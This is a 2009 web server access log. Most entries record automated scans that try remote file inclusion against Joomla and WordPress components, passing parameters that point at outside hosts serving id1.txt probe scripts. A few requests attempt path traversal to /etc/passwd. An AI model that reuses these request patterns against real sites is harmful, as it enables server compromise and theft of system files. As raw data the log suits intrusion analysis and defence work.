217.147.30.80 - - [12/Jul/2009:00:42:06 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jul/2009:00:42:27 -0400] "GET /logs/error_log.Q109052400%20/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.191.102.117 - - [12/Jul/2009:00:42:33 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:42:33 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:44 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:44 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:44 -0400] "GET /logs/access_log.Q109060500//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:44 -0400] "GET /logs/access_log.Q109051300//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:45 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:45 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:45 -0400] "GET /logs/access_log.Q109060500//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:46 -0400] "GET /logs/access_log.Q109051300//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:53 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:53 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:53 -0400] "GET /logs/access_log.Q109060500%20%20//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:53 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:53 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:53 -0400] "GET /logs/access_log.Q109060500%20%20//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:54 -0400] "GET /logs/access_log.Q109051300%20%20//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:43:54 -0400] "GET /logs/access_log.Q109051300%20%20//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:00:43:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1193A84E968320002DD1058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.28.140 - - [12/Jul/2009:00:44:05 -0400] "GET /logs/access_log.Q109070300%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:44:06 -0400] "GET /logs/access_log.Q109070300%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:45:50 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:45:50 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:45:50 -0400] "GET /logs/access_log.Q109060500//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:45:50 -0400] "GET /logs/access_log.Q109051300//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:45:54 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:47:08 -0400] "GET /logs/access_log.Q109060500//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:47:08 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:47:08 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:47:08 -0400] "GET /logs/access_log.Q109051300//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
72.30.78.244 - - [12/Jul/2009:00:47:21 -0400] "GET /logs/error_log.Q109062600 HTTP/1.0" 200 2330882 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.244 - - [12/Jul/2009:00:47:21 -0400] "GET /logs/error_log.Q109062600 HTTP/1.0" 200 2330882 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [12/Jul/2009:00:48:06 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:48:06 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:48:06 -0400] "GET /logs/access_log.Q109060500//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:48:07 -0400] "GET /logs//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:48:07 -0400] "GET /logs/access_log.Q109060500//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:48:07 -0400] "GET //gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:48:08 -0400] "GET /logs/access_log.Q109051300//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:48:09 -0400] "GET /logs/access_log.Q109051300//gift-certificates-store//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
201.217.51.191 - - [12/Jul/2009:00:48:10 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.217.51.191 - - [12/Jul/2009:00:48:10 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.217.51.191 - - [12/Jul/2009:00:48:10 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:48:35 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:49:03 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:49:17 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:49:39 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.217.51.191 - - [12/Jul/2009:00:50:23 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.217.51.191 - - [12/Jul/2009:00:50:23 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.0.139.129 - - [12/Jul/2009:00:50:28 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.139.129 - - [12/Jul/2009:00:50:28 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.139.129 - - [12/Jul/2009:00:50:28 -0400] "GET /logs/access_log.Q109070200%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.0.139.129 - - [12/Jul/2009:00:50:28 -0400] "GET /logs/error_log.Q109070600%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:50:46 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:00:51:28 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:00:51:28 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:00:51:28 -0400] "GET /logs/access_log.Q109062200/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
124.0.139.129 - - [12/Jul/2009:00:51:30 -0400] "GET /logs/error_log.Q109070600//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.0.139.129 - - [12/Jul/2009:00:51:30 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:00:51:33 -0400] "GET /logs/access_log.Q109063000/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:00:52:13 -0400] "GET /logs/access_log.Q109062200%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:00:52:18 -0400] "GET /logs/access_log.Q109063000%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.30.78.244 - - [12/Jul/2009:00:52:18 -0400] "GET /logs/error_log.Q109051800 HTTP/1.0" 200 3423611 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.244 - - [12/Jul/2009:00:52:19 -0400] "GET /logs/error_log.Q109051800 HTTP/1.0" 200 3423611 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.191.102.117 - - [12/Jul/2009:00:53:25 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:25 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:25 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:25 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:25 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:25 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:30 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:30 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:30 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:31 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:31 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:31 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.30.78.244 - - [12/Jul/2009:00:53:06 -0400] "GET /logs/access_log.Q109062500 HTTP/1.0" 200 5016688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.191.102.117 - - [12/Jul/2009:00:53:36 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:37 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:38 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:41 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:53 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:53 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:53 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:55 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:55 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:56 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:53:58 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.143.81.26 - - [12/Jul/2009:00:54:00 -0400] "GET /index.php?pagina=/../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
83.143.81.26 - - [12/Jul/2009:00:54:00 -0400] "GET /logs/index.php?pagina=/../../../../../../../../etc/passwd HTTP/1.1" 404 212 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
64.191.102.117 - - [12/Jul/2009:00:54:00 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:54:07 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:54:07 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:54:07 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:11 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:14 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:14 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:54:19 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:20 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:20 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:20 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:24 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:24 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:26 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:26 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:26 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:27 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:41 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:41 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:41 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:42 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:54:44 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
